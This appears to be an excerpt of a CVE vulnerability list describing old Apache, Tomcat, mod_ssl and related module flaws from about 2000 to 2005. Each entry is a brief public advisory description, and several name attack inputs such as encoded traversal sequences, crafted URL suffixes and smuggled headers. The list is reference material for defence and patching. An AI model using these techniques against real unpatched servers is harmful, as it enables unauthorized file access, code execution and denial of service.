5559| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
5560| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
5561| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
5562| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
5563| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
5564| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
5565| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
5566| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
5567| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
5568| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
5569| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
5570| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
5571| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
5572| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
5573| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
5574| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
5575| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
5576| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
5577| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
5578| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
5579| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
5580| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
5581| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
5582| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
5583| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
5584| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
5585| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
5586| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
5587| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
5588| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
5589| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
5590| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
5591| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
5592| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
5593| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
5594| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
5595| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
5596| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
5597| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
5598| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
5599| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
5600| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
5601| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
5602| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
5603| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
5604| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
5605| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
5606| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
5607| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
5608| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
5609| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
5610| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
5611| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
5612| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
5613| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
5614| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
5615| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
5616| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
5617| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
5618| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
5619| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
5620| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
5621| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
5622| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
5623| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
5624| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
5625| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
5626| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
5627| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
5628| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
5629| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
5630| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
5631| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
5632| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
5633| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
5634| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
5635| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
5636| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
5637| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
5638| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
5639| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
5640| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
5641| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
5642| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
5643| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
5644| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
5645| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
5646| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
5647| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
5648| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
5649| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
5650| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
5651| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
5652| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
5653| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
5654| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
5655| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
5656| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
5657| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
5658| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
5659| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
5660| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
5661| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
5662| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
5663| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
5664| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
5665| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
5666| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
5667| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
5668| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
5669| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
5670| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
5671| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
5672| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
5673| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
5674| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
5675| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
5676| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
5677| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
5678| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
5679| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
5680| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
5681| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
5682| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
5683| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
5684| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
5685| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
5686| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
5687| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
5688| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
5689| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
5690| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
5691| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
5692| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
5693| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
5694| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
5695| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
5696| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
5697| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
5698| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
5699| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
5700| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
5701| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
